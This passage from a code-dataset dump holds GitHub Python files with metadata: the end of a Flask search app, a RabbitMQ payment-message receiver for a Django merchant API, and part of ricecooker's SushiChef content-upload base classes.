app.run(debug=True, host='0.0.0.0')\n", "repo_name": "cehaletx/pub", "sub_path": "msmarco4/msmarco.py", 
"file_name": "msmarco.py", "file_ext": "py", "file_size_in_byte": 3022, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.getenv", "line_number": 7, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 8, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 9, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "elasticsearch.Elasticsearch", "line_number": 17, "usage_type": "call"}, {"api_name": "openai.api_key", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 32, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 33, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 33, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 35, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 35, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 37, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "queries.hybrid_search", "line_number": 47, "usage_type": "call"}, {"api_name": "queries.generate_text", "line_number": 49, "usage_type": "call"}, {"api_name": "queries.search_documents", "line_number": 55, "usage_type": "call"}, {"api_name": "queries.generate_text", "line_number": 57, "usage_type": "call"}, {"api_name": "queries.e_search_documents", "line_number": 63, "usage_type": "call"}, {"api_name": "queries.generate_text", "line_number": 65, "usage_type": "call"}, {"api_name": "queries.rrf", "line_number": 71, "usage_type": "call"}, {"api_name": "queries.generate_text", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "23974543199", "text": "import pika\nimport os\nimport traceback\nimport threading\nimport json\nimport sys\nfrom types import FunctionType\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nprint(BASE_DIR)\nsys.path.append(BASE_DIR)\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'merchant_api.settings')\nimport django\ndjango.setup()\n\nfrom merchant_api.settings import config\nfrom merchant_api.payments.api import parse_payment_message, parse_transfer_messager\n\n\nclass Receiver(threading.Thread):\n\n def __init__(self, queue):\n super().__init__()\n self.network = queue\n\n def run(self):\n connection = 
pika.BlockingConnection(pika.ConnectionParameters(\n 'rabbitmq',\n 5672,\n os.getenv('RABBITMQ_DEFAULT_VHOST', 'merchant_api'),\n pika.PlainCredentials(\n os.getenv('RABBITMQ_DEFAULT_USER', 'merchant_api'),\n os.getenv('RABBITMQ_DEFAULT_PASS', 'merchant_api')\n ),\n ))\n\n channel = connection.channel()\n\n queue_name = config.networks.get(self.network).queue\n\n channel.queue_declare(\n queue=queue_name,\n durable=True,\n auto_delete=False,\n exclusive=False\n )\n channel.basic_consume(\n queue=queue_name,\n on_message_callback=self.callback\n )\n\n print(\n 'RECEIVER MAIN: started on {net} with queue `{queue_name}`'\n .format(net=self.network, queue_name=queue_name), flush=True\n )\n\n channel.start_consuming()\n\n def payment(self, message):\n print('PAYMENT MESSAGE RECEIVED', flush=True)\n parse_payment_message(message)\n\n def transferred(self, message):\n print('TRANSFER CONFIRMATION RECEIVED', flush=True)\n parse_transfer_messager(message)\n\n def callback(self, ch, method, properties, body):\n print('received', body, properties, method, flush=True)\n try:\n message = json.loads(body.decode())\n if message.get('status', '') == 'COMMITTED':\n getattr(self, properties.type, self.unknown_handler)(message)\n except Exception as e:\n print('\\n'.join(traceback.format_exception(*sys.exc_info())),\n flush=True)\n else:\n ch.basic_ack(delivery_tag=method.delivery_tag)\n\n def unknown_handler(self, message):\n print('unknown message', message, flush=True)\n\n\nnetworks = config.networks.keys()\n\n\nif __name__ == '__main__':\n for network in networks:\n rec = Receiver(network)\n rec.start()\n", "repo_name": "DucatusX/ducatus_merchant_api", "sub_path": "merchant_api/receiver.py", "file_name": "receiver.py", "file_ext": "py", "file_size_in_byte": 2599, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.environ.setdefault", "line_number": 13, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.setup", "line_number": 15, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pika.BlockingConnection", "line_number": 28, "usage_type": "call"}, {"api_name": "pika.ConnectionParameters", "line_number": 28, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 31, "usage_type": "call"}, {"api_name": "pika.PlainCredentials", "line_number": 32, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 33, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 34, "usage_type": "call"}, {"api_name": "merchant_api.settings.config.networks.get", "line_number": 40, "usage_type": "call"}, {"api_name": "merchant_api.settings.config.networks", "line_number": 40, "usage_type": "attribute"}, {"api_name": "merchant_api.settings.config", "line_number": 40, "usage_type": "name"}, {"api_name": "merchant_api.payments.api.parse_payment_message", "line_number": 62, "usage_type": "call"}, {"api_name": "merchant_api.payments.api.parse_transfer_messager", "line_number": 66, "usage_type": "call"}, {"api_name": "json.loads", 
"line_number": 71, "usage_type": "call"}, {"api_name": "traceback.format_exception", "line_number": 75, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 75, "usage_type": "call"}, {"api_name": "merchant_api.settings.config.networks.keys", "line_number": 84, "usage_type": "call"}, {"api_name": "merchant_api.settings.config.networks", "line_number": 84, "usage_type": "attribute"}, {"api_name": "merchant_api.settings.config", "line_number": 84, "usage_type": "name"}]} +{"seq_id": "42265459197", "text": "import argparse\nimport csv\nimport json\nimport logging\nimport os\nimport re\nimport sys\nfrom datetime import datetime\nfrom warnings import warn\n\nimport requests\n\nfrom . import config\nfrom .classes import files\nfrom .classes import nodes\nfrom .commands import uploadchannel_wrapper\nfrom .exceptions import InvalidUsageException\nfrom .exceptions import raise_for_invalid_channel\nfrom .managers.progress import Status\nfrom .utils.downloader import get_archive_filename\nfrom .utils.jsontrees import build_tree_from_json\nfrom .utils.jsontrees import get_channel_node_from_json\nfrom .utils.jsontrees import read_tree_from_json\nfrom .utils.linecook import build_ricecooker_json_tree\nfrom .utils.linecook import FolderExistsAction\nfrom .utils.metadata_provider import CsvMetadataProvider\nfrom .utils.metadata_provider import DEFAULT_CHANNEL_INFO_FILENAME\nfrom .utils.metadata_provider import DEFAULT_CONTENT_INFO_FILENAME\nfrom .utils.metadata_provider import DEFAULT_EXERCISE_QUESTIONS_INFO_FILENAME\nfrom .utils.metadata_provider import DEFAULT_EXERCISES_INFO_FILENAME\nfrom .utils.tokens import get_content_curation_token\nfrom .utils.youtube import YouTubePlaylistUtils\nfrom .utils.youtube import YouTubeVideoUtils\nfrom ricecooker.utils.images import convert_image\n\n\n# SUSHI CHEF BASE CLASS\n################################################################################\n\n\nclass SushiChef(object):\n \"\"\"\n This is the base class that all content integration scripts should subclass.\n Sushi chef scripts call the `main` method as the entry point, which in turn\n calls the `run` method to do the work (see `uploadchannel` in `commands.py`).\n \"\"\"\n\n CHEF_RUN_DATA = config.CHEF_DATA_DEFAULT # loaded from chefdata/chef_data.json\n TREES_DATA_DIR = config.TREES_DATA_DIR # tree archives and JsonTreeChef inputs\n\n channel_node_class = nodes.ChannelNode\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n The SushiChef initialization concerns maintly parsing command line args.\n Overrride this method in your sushi chef class to add custom arguments.\n \"\"\"\n\n # persistent settings for the chef, we check if it exists first in order to\n # support assignment as a class-level variable.\n if not hasattr(self, \"SETTINGS\"):\n self.SETTINGS = {}\n else:\n if \"generate-missing-thumbnails\" in self.SETTINGS:\n warning_text = \"thumbnails setting is deprecated and will be replaced by thumbnails in version 0.8 please update\"\n config.LOGGER.warn(warning_text)\n warn(warning_text, DeprecationWarning)\n self.SETTINGS[\"thumbnails\"] == self.SETTINGS[\n \"generate-missing-thumbnails\"\n ]\n\n if \"compress-videos\" in self.SETTINGS:\n warning_text = \"compress-videos setting is deprecated and will be replaced by compress in version 0.8 please update\"\n config.LOGGER.warn(warning_text)\n warn(warning_text, DeprecationWarning)\n self.SETTINGS[\"compress\"] == self.SETTINGS[\"compress-videos\"]\n\n # these will be assigned to later by the argparse handling.\n self.args = None\n 
self.options = None\n\n        # ARGPARSE SETUP\n        # We don't want to add argparse help if subclass has an __init__ method\n        subclasses = self.__class__.__mro__[:-2]  # all subclasses after this\n        if any([\"__init__\" in c.__dict__.keys() for c in subclasses]):\n            add_parser_help = False  # assume subclass' __init__ will add help\n        else:\n            add_parser_help = True\n        parser = argparse.ArgumentParser(\n            description=\"Chef script for uploading content to Kolibri Studio.\",\n            add_help=add_parser_help,\n        )\n        self.arg_parser = parser  # save as class attr. for subclasses to extend\n        # ARGS\n        parser.add_argument(\n            \"command\",\n            nargs=\"?\",\n            default=\"uploadchannel\",\n            help=\"Desired action: dryrun or uploadchannel (default).\",\n        )\n        parser.add_argument(\n            \"--token\",\n            default=\"#\",\n            help=\"Studio API Access Token (specify either the token value or the path of a file that contains the token).\",\n        )\n        parser.add_argument(\n            \"-u\",\n            \"--update\",\n            action=\"store_true\",\n            help=\"Force file re-download (skip .ricecookerfilecache/).\",\n        )\n        parser.add_argument(\n            \"--debug\", action=\"store_true\", help=\"Print extra debugging information.\"\n        )\n        parser.add_argument(\n            \"-v\",\n            \"--verbose\",\n            action=\"store_true\",\n            default=True,\n            help=\"Verbose mode (default).\",\n        )\n        parser.add_argument(\n            \"--warn\", action=\"store_true\", help=\"Print errors and warnings.\"\n        )\n        parser.add_argument(\"--quiet\", action=\"store_true\", help=\"Print only errors.\")\n        parser.add_argument(\n            \"--compress\",\n            action=\"store_true\",\n            help=\"Compress videos using ffmpeg -crf=32 -b:a 32k mono.\",\n        )\n        parser.add_argument(\n            \"--thumbnails\",\n            action=\"store_true\",\n            help=\"Automatically generate thumbnails for content nodes.\",\n        )\n        parser.add_argument(\n            \"--download-attempts\",\n            type=int,\n            default=3,\n            help=\"Maximum number of times to retry downloading files.\",\n        )\n        parser.add_argument(\n            \"--resume\",\n            action=\"store_true\",\n            help=\"Resume chef session from a specified step.\",\n        )\n        allsteps = [step.name.upper() for step in Status]\n        parser.add_argument(\n            \"--step\",\n            choices=allsteps,\n            default=\"LAST\",\n            help=\"Step to resume progress from (use with --resume).\",\n        )\n        parser.add_argument(\n            \"--prompt\",\n            action=\"store_true\",\n            help=\"Prompt user to open the channel after the chef run.\",\n        )\n        parser.add_argument(\n            \"--deploy\",\n            dest=\"stage\",\n            action=\"store_false\",\n            help=\"Immediately deploy changes to channel's main tree. This operation will overwrite the previous channel content. Use only during development.\",\n        )\n        parser.add_argument(\n            \"--publish\",\n            action=\"store_true\",\n            help=\"Publish newly uploaded version of the channel.\",\n        )\n        parser.add_argument(\n            \"--sample\",\n            type=int,\n            metavar=\"SIZE\",\n            help=\"Upload a sample of SIZE nodes from the channel.\",\n        )\n        parser.add_argument(\n            \"--reset\",\n            dest=\"reset_deprecated\",\n            action=\"store_true\",\n            help=\"(deprecated) Restarting the chef run is the default.\",\n        )\n        parser.add_argument(\n            \"--stage\",\n            dest=\"stage_deprecated\",\n            action=\"store_true\",\n            help=(\n                \"(deprecated) Stage updated content for review.\"\n                \" Uploading a staging tree is now the default behavior. 
Use --deploy to upload to the main tree.\"\n            ),\n        )\n\n        # [OPTIONS] --- extra key=value options are supported, but do not appear in help\n\n        self.load_chef_data()\n\n    def get_setting(self, setting, default=None):\n        \"\"\"\n        Gets a setting set on the chef via its SETTINGS dictionary.\n\n        It is recommended to use this method rather than checking SETTINGS directly,\n        as it allows for a default when not set, and allows for command line overrides\n        for some settings.\n\n        :param setting: String key of the setting to check\n        :param default: Value to return if the key is not found.\n        :return: Setting value if set, or default if not set.\n        \"\"\"\n\n        override = None\n        # If there is a command line flag for this setting, allow for it to override the chef\n        # default. Note that these are all boolean flags, so they are true if set, false if not.\n        if setting == \"thumbnails\":\n            override = self.args and self.args[\"thumbnails\"]\n\n        if setting == \"compress\":\n            override = self.args and self.args[\"compress\"]\n\n        if setting in self.SETTINGS:\n            return override or self.SETTINGS[setting]\n\n        return override or default\n\n    def parse_args_and_options(self):\n        \"\"\"\n        Parses all known command line args and also additional key=value options.\n        NOTE: this should be the only place cli args are parsed in order to have\n        a single consistent interface for all chef scripts.\n\n        Args: None, but implicitly depends on `self.arg_parser` and `sys.argv`\n        Returns:\n            tuple (`args`, `options`)\n                args (dict): chef command line arguments\n                options (dict): extra key=value options given on command line\n        \"\"\"\n        args_namespace, options_list = self.arg_parser.parse_known_args()\n        args = args_namespace.__dict__\n\n        # Handle case when command is not specified but key=value options are\n        allcommands = [\n            \"uploadchannel\",  # Whole pipeline: pre_run > run > [deploy,publish]\n            \"dryrun\",  # Do pre_run and run but do not upload to Studio\n        ]\n        command_arg = args[\"command\"]\n        if command_arg not in allcommands and \"=\" in command_arg:\n            # a key=value options pair was incorrectly recognized as the command\n            args[\"command\"] = \"uploadchannel\"\n            options_list.append(command_arg)  # put command_arg where it belongs\n\n        # Print CLI deprecation warnings info\n        if args[\"stage_deprecated\"]:\n            config.LOGGER.warning(\n                \"DEPRECATION WARNING: --stage is now the default behavior. The --stage flag has been deprecated and will be removed in ricecooker 1.0.\"\n            )\n        if args[\"reset_deprecated\"]:\n            config.LOGGER.warning(\n                \"DEPRECATION WARNING: --reset is now the default behavior. The --reset flag has been deprecated and will be removed in ricecooker 1.0.\"\n            )\n        if args[\"publish\"] and args[\"stage\"]:\n            raise InvalidUsageException(\n                \"The --publish argument must be used together with the --deploy argument.\"\n            )\n        logging_args = [key for key in [\"quiet\", \"warn\", \"debug\"] if args[key]]\n        if len(logging_args) > 1:\n            raise InvalidUsageException(\n                \"Arguments --quiet, --warn, and --debug cannot be used together.\"\n            )\n\n        if args[\"command\"] == \"uploadchannel\":\n            # Make sure token is provided. There are four ways to specify:\n            # 1. --token=path to token-containing file\n            # 2. --token=140fefe...1f3\n            # when --token is not given on the command line, it defaults to # and\n            # 3. we look for environment variable STUDIO_TOKEN\n            # 4. 
else prompt user\n            # If ALL of these fail, this call will raise and chef run will stop.\n            args[\"token\"] = get_content_curation_token(args[\"token\"])\n\n        # Parse additional keyword arguments from `options_list`\n        options = {}\n        for preoption in options_list:\n            try:\n                option_key, option_value = preoption.split(\"=\")\n                options.update({option_key.strip(): option_value.strip()})\n            except IndexError:\n                msg = \"Invalid option '{0}': use [key]=[value] format (no whitespace)\".format(\n                    preoption\n                )\n                raise InvalidUsageException(msg)\n\n        self.args = args\n        self.options = options\n\n        return args, options\n\n    def config_logger(self, args, options):\n        \"\"\"\n        Set up stream (stderr), local file logging (logs/yyyy-mm-dd__HHMM.log).\n        This method is called as soon as we parse args so we can apply the\n        user-preferred logging level settings.\n        \"\"\"\n        # Set desired logging level based on command line arguments\n        level = logging.INFO\n        if args[\"debug\"]:\n            level = logging.DEBUG\n        elif args[\"warn\"]:\n            level = logging.WARNING\n        elif args[\"quiet\"]:\n            level = logging.ERROR\n\n        # 2. File handler (logs/yyyy-mm-dd__HHMM.log)\n        try:\n            # FIXME: This code assumes we run chefs from the chef's root directory.\n            # We probably want to have chefs set a root directory for files like this.\n            if not os.path.exists(\"logs\"):\n                os.makedirs(\"logs\")\n            logfile_main = datetime.now().strftime(\"%Y-%m-%d__%H%M\") + \".log\"\n            logfile_error = datetime.now().strftime(\"%Y-%m-%d__%H%M\") + \".err.log\"\n            main_log = os.path.join(\"logs\", logfile_main)\n            error_log = os.path.join(\"logs\", logfile_error)\n\n            config.setup_logging(level=level, main_log=main_log, error_log=error_log)\n\n        except Exception as e:\n            config.LOGGER.warning(\"Unable to set up file logging due to %s\" % e)\n\n    def get_channel(self, **kwargs):\n        \"\"\"\n        This method creates an empty `ChannelNode` object based on info from the\n        chef class' `channel_info` attribute. A subclass can override this method\n        in cases where channel metadata is dynamic and depends on `kwargs`.\n        Args:\n            kwargs (dict): additional keyword arguments given to `uploadchannel`\n        Returns: an empty `ChannelNode` that contains all the channel metadata\n        \"\"\"\n        if hasattr(self, \"channel_info\"):\n            # Make sure we're not using the template id values in `channel_info`\n            template_domains = [\"\"]\n            using_template_domain = (\n                self.channel_info[\"CHANNEL_SOURCE_DOMAIN\"] in template_domains\n            )\n            if using_template_domain:\n                config.LOGGER.error(\n                    \"Template source domain detected. Please change CHANNEL_SOURCE_DOMAIN before running this chef.\"\n                )\n\n            template_ids = [\"\", \"\"]\n            using_template_source_id = (\n                self.channel_info[\"CHANNEL_SOURCE_ID\"] in template_ids\n            )\n            if using_template_source_id:\n                config.LOGGER.error(\n                    \"Template channel source ID detected. 
Please change CHANNEL_SOURCE_ID before running this chef.\"\n                )\n\n            if using_template_domain or using_template_source_id:\n                sys.exit(1)\n\n            # If a subclass has a `channel_info` attribute (dict) it doesn't need\n            # to define a `get_channel` method and can instead rely on this code:\n            channel = self.channel_node_class(\n                source_domain=self.channel_info[\"CHANNEL_SOURCE_DOMAIN\"],\n                source_id=self.channel_info[\"CHANNEL_SOURCE_ID\"],\n                title=self.channel_info[\"CHANNEL_TITLE\"],\n                tagline=self.channel_info.get(\"CHANNEL_TAGLINE\"),\n                channel_id=self.channel_info.get(\"CHANNEL_ID\"),\n                thumbnail=self.channel_info.get(\"CHANNEL_THUMBNAIL\"),\n                language=self.channel_info.get(\"CHANNEL_LANGUAGE\"),\n                description=self.channel_info.get(\"CHANNEL_DESCRIPTION\"),\n            )\n            return channel\n        else:\n            raise NotImplementedError(\n                \"Subclass must define get_channel method or have a channel_info (dict) attribute.\"\n            )\n\n    def construct_channel(self, **kwargs):\n        \"\"\"\n        This should be overridden by the chef script's construct_channel method.\n        Args:\n            kwargs (dict): additional keyword arguments given to `uploadchannel`\n        Returns: a `ChannelNode` object representing the populated topic tree\n        \"\"\"\n        raise NotImplementedError(\"Chef subclass must implement this method\")\n\n    def load_chef_data(self):\n        if os.path.exists(config.DATA_PATH):\n            self.CHEF_RUN_DATA = json.load(open(config.DATA_PATH))\n\n    def save_channel_tree_as_json(self, channel):\n        filename = os.path.join(\n            self.TREES_DATA_DIR, \"{}.json\".format(self.CHEF_RUN_DATA[\"current_run\"])\n        )\n        os.makedirs(self.TREES_DATA_DIR, exist_ok=True)\n        json.dump(channel.get_json_tree(), open(filename, \"w\"), indent=2)\n        self.CHEF_RUN_DATA[\"tree_archives\"][\"previous\"] = self.CHEF_RUN_DATA[\n            \"tree_archives\"\n        ][\"current\"]\n        self.CHEF_RUN_DATA[\"tree_archives\"][\"current\"] = filename.replace(\n            os.getcwd() + \"/\", \"\"\n        )\n        self.save_chef_data()\n\n    def save_channel_metadata_as_csv(self, channel):\n        # create data folder in chefdata\n        DATA_DIR = os.path.join(\"chefdata\", \"data\")\n        os.makedirs(DATA_DIR, exist_ok=True)\n        metadata_csv = csv.writer(\n            open(\n                os.path.join(DATA_DIR, \"content_metadata.csv\"),\n                \"w\",\n                newline=\"\",\n                encoding=\"utf-8\",\n            )\n        )\n        metadata_csv.writerow(config.CSV_HEADERS)\n\n        channel.save_channel_children_to_csv(metadata_csv)\n\n    def load_channel_metadata_from_csv(self):\n        metadata_dict = dict()\n        metadata_csv = None\n        CSV_FILE_PATH = os.path.join(\"chefdata\", \"data\", \"content_metadata.csv\")\n        if os.path.exists(CSV_FILE_PATH):\n            metadata_csv = csv.DictReader(open(CSV_FILE_PATH, \"r\", encoding=\"utf-8\"))\n            for line in metadata_csv:\n                # Add to metadata_dict any updated data. 
Skip if none\n                line_source_id = line[\"Source ID\"]\n                line_new_title = line[\"New Title\"]\n                line_new_description = line[\"New Description\"]\n                line_new_tags = line[\"New Tags\"]\n                if (\n                    line_new_title != \"\"\n                    or line_new_description != \"\"\n                    or line_new_tags != \"\"\n                ):\n                    metadata_dict[line_source_id] = {}\n                    if line_new_title != \"\":\n                        metadata_dict[line_source_id][\"New Title\"] = line_new_title\n                    if line_new_description != \"\":\n                        metadata_dict[line_source_id][\n                            \"New Description\"\n                        ] = line_new_description\n                    if line_new_tags != \"\":\n                        tags_arr = re.split(\",| ,\", line_new_tags)\n                        metadata_dict[line_source_id][\"New Tags\"] = tags_arr\n        return metadata_dict\n\n    def save_chef_data(self):\n        json.dump(self.CHEF_RUN_DATA, open(config.DATA_PATH, \"w\"), indent=2)\n\n    def apply_modifications(self, contentNode, metadata_dict={}):\n        # Skip if no metadata file passed in or no updates in metadata_dict\n        if metadata_dict == {}:\n            return\n\n        is_channel = isinstance(contentNode, nodes.ChannelNode)\n\n        if not is_channel:\n            # Add modifications to contentNode\n            if contentNode.source_id in metadata_dict:\n                contentNode.node_modifications = metadata_dict[contentNode.source_id]\n        for child in contentNode.children:\n            self.apply_modifications(child, metadata_dict)\n\n    def pre_run(self, args, options):\n        \"\"\"\n        This function is called before the Chef's `run` method is called.\n        By default this function does nothing, but a subclass can use this hook to\n        run prerequisite tasks.\n        Args:\n            args (dict): chef command line arguments\n            options (dict): extra key=value options given on command line\n        \"\"\"\n\n    def run(self, args, options):\n        \"\"\"\n        This function calls uploadchannel which performs all the run steps:\n        Args:\n            args (dict): chef command line arguments\n            options (dict): additional key=value options given on command line\n        \"\"\"\n        args_copy = args.copy()\n        args_copy[\"token\"] = args_copy[\"token\"][0:6] + \"...\"\n        config.LOGGER.info(\n            \"In SushiChef.run method. args=\"\n            + str(args_copy)\n            + \" options=\"\n            + str(options)\n        )\n\n        run_id = datetime.now().strftime(\"%Y-%m-%d__%H%M\")\n        self.CHEF_RUN_DATA[\"current_run\"] = run_id\n        self.CHEF_RUN_DATA[\"runs\"].append({\"id\": run_id})\n\n        # TODO(Kevin): move self.download_content() call here\n        self.pre_run(args, options)\n        uploadchannel_wrapper(self, args, options)\n\n    def main(self):\n        \"\"\"\n        Main entry point that content integration scripts should call.\n        \"\"\"\n        args, options = self.parse_args_and_options()\n        self.config_logger(args, options)\n        self.run(args, options)\n\n\n# JSON TREE CHEF\n################################################################################\n\n\nclass JsonTreeChef(SushiChef):\n    \"\"\"\n    This sushi chef loads the data for a channel from a ricecooker json tree file\n    which contains the json representation of a full ricecooker node tree.\n    For example the content hierarchy with two levels of subfolders and a PDF\n    content node looks like this::\n\n        {\n            \"title\": \"Open Stax\",\n            \"source_domain\": \"openstax.org\",\n            \"source_id\": \"open-stax\",\n            \"language\": \"en\",\n            \"children\": [\n                {\n                    \"kind\": \"topic\",\n                    \"title\": \"Humanities\",\n                    \"children\": [\n                        {\n                            \"kind\": \"topic\",\n                            \"title\": \"U.S. History\",\n                            \"children\": [\n                                {\n                                    \"kind\": \"document\",\n                                    \"source_id\": \"Open Stax/Humanities/U.S. History/Student Handbook.pdf\",\n                                    \"title\": \"Student Handbook\",\n                                    \"author\": \"P. 
Scott Corbett, Volker Janssen, ...\",\n                                    \"license\": {\n                                        \"license_id\": \"CC BY\"\n                                    },\n                                    \"files\": [\n                                        {\n                                            \"file_type\": \"document\",\n                                            \"path\": \"content/open_stax_zip/Open Stax/Humanities/U.S. History/Student Handbook.pdf\"\n                                        }\n                                    ]\n                                }]}]}]}\n\n    Each object in the json tree corresponds to a TopicNode, a ContentNode that\n    contains Files, or an Exercise that contains Questions.\n    \"\"\"\n\n    RICECOOKER_JSON_TREE = \"ricecooker_json_tree.json\"\n\n    def pre_run(self, args, options):\n        \"\"\"\n        This function is called before `run` to create the json tree file.\n        \"\"\"\n        raise NotImplementedError(\n            \"JsonTreeChef subclass must implement the `pre_run` method.\"\n        )\n\n    def get_json_tree_path(self, *args, **kwargs):\n        \"\"\"\n        Return path to ricecooker json tree file. Override this method to use\n        a custom filename, e.g., for channels with multiple languages.\n        \"\"\"\n        json_tree_path = os.path.join(self.TREES_DATA_DIR, self.RICECOOKER_JSON_TREE)\n        return json_tree_path\n\n    def get_channel(self, **kwargs):\n        # Load channel info from json_tree\n        json_tree_path = self.get_json_tree_path(**kwargs)\n        json_tree = read_tree_from_json(json_tree_path)\n        channel = get_channel_node_from_json(json_tree)\n        return channel\n\n    def construct_channel(self, **kwargs):\n        \"\"\"\n        Build the channel tree by adding TopicNodes and ContentNode children.\n        \"\"\"\n        channel = self.get_channel(**kwargs)\n        json_tree_path = self.get_json_tree_path(**kwargs)\n        json_tree = read_tree_from_json(json_tree_path)\n        build_tree_from_json(channel, json_tree[\"children\"])\n        raise_for_invalid_channel(channel)\n        return channel\n\n\n# SOUSCHEF LINECOOK\n################################################################################\n\n\nclass LineCook(JsonTreeChef):\n    \"\"\"\n    This sushi chef uses os.walk to import the content in `channeldir` folder\n    `directory structure + CSV metadata files --> Kolibri channel`.\n    Folders and CSV files can be created by hand or by a `souschef` script.\n    \"\"\"\n\n    metadata_provider = None\n\n    def __init__(self, *args, **kwargs):\n        super(LineCook, self).__init__(*args, **kwargs)\n\n        # We don't want to add argparse help if subclass has an __init__ method\n        subclasses = self.__class__.__mro__[:-5]  # all subclasses after this\n        if any([\"__init__\" in c.__dict__.keys() for c in subclasses]):\n            add_parser_help = False  # assume subclass' __init__ will add help\n        else:\n            add_parser_help = True\n\n        self.arg_parser = argparse.ArgumentParser(\n            description=\"Upload the folder hierarchy to the content workshop.\",\n            add_help=add_parser_help,\n            parents=[self.arg_parser],\n        )\n        self.arg_parser.add_argument(\n            \"--channeldir\",\n            required=True,\n            action=FolderExistsAction,\n            help=\"The directory that corresponds to the root of the channel.\",\n        )\n        self.arg_parser.add_argument(\n            \"--channelinfo\",\n            default=DEFAULT_CHANNEL_INFO_FILENAME,\n            help=\"Filename for the channel metadata (assumed to be sibling of channeldir)\",\n        )\n        self.arg_parser.add_argument(\n            \"--contentinfo\",\n            default=DEFAULT_CONTENT_INFO_FILENAME,\n            help=\"Filename for content metadata (assumed to be sibling of channeldir)\",\n        )\n        self.arg_parser.add_argument(\n            \"--exercisesinfo\",\n            default=DEFAULT_EXERCISES_INFO_FILENAME,\n            help=\"Filename for exercises metadata (assumed to be sibling of channeldir)\",\n        )\n        self.arg_parser.add_argument(\n            \"--questionsinfo\",\n            default=DEFAULT_EXERCISE_QUESTIONS_INFO_FILENAME,\n            help=\"Filename for exercise questions metadata (assumed to be sibling of channeldir)\",\n        )\n        
self.arg_parser.add_argument(\n \"--generate\",\n action=\"store_true\",\n help=\"Generate metadata files from directory structure.\",\n )\n self.arg_parser.add_argument(\n \"--importstudioid\",\n help=\"Generate CSV metadata from a specified studio_id (e.g. studio_id of main_tree for some channel)\",\n )\n\n def _init_metadata_provider(self, args, options):\n if args[\"contentinfo\"].endswith(\".csv\"):\n metadata_provider = CsvMetadataProvider(\n args[\"channeldir\"],\n channelinfo=args[\"channelinfo\"],\n contentinfo=args[\"contentinfo\"],\n exercisesinfo=args[\"exercisesinfo\"],\n questionsinfo=args[\"questionsinfo\"],\n )\n else:\n raise ValueError(\"Unknown contentinfo file format \" + args[\"contentinfo\"])\n self.metadata_provider = metadata_provider\n\n def pre_run(self, args, options):\n \"\"\"\n This function is called before `run` in order to build the json tree.\n \"\"\"\n if \"generate\" in args and args[\"generate\"]:\n self.metadata_provider = CsvMetadataProvider(\n args[\"channeldir\"],\n channelinfo=args[\"channelinfo\"],\n contentinfo=args[\"contentinfo\"],\n exercisesinfo=args[\"exercisesinfo\"],\n questionsinfo=args[\"questionsinfo\"],\n validate_and_cache=False,\n )\n self.metadata_provider.generate_templates(exercise_questions=True)\n self.metadata_provider.generate_contentinfo_from_channeldir(args, options)\n sys.exit(0)\n\n elif \"importstudioid\" in args and args[\"importstudioid\"]:\n studio_id = args[\"importstudioid\"]\n config.LOGGER.info(\"Calling with importstudioid... \" + studio_id)\n self.metadata_provider = CsvMetadataProvider(\n args[\"channeldir\"],\n channelinfo=args[\"channelinfo\"],\n contentinfo=args[\"contentinfo\"],\n exercisesinfo=args[\"exercisesinfo\"],\n questionsinfo=args[\"questionsinfo\"],\n validate_and_cache=False,\n )\n self.metadata_provider.generate_templates(exercise_questions=True)\n self.metadata_provider.generate_exercises_from_importstudioid(args, options)\n sys.exit(0)\n\n if self.metadata_provider is None:\n self._init_metadata_provider(args, options)\n kwargs = {} # combined dictionary of argparse args and extra options\n kwargs.update(args)\n kwargs.update(options)\n json_tree_path = self.get_json_tree_path(**kwargs)\n build_ricecooker_json_tree(\n args, options, self.metadata_provider, json_tree_path\n )\n\n\nclass YouTubeSushiChef(SushiChef):\n \"\"\"\n Class for converting a list of YouTube playlists and/or videos into a channel.\n\n To use this class, your subclass must implement either the get_playlist_ids() or\n the get_video_ids() method, along with the get_channel_metadata() 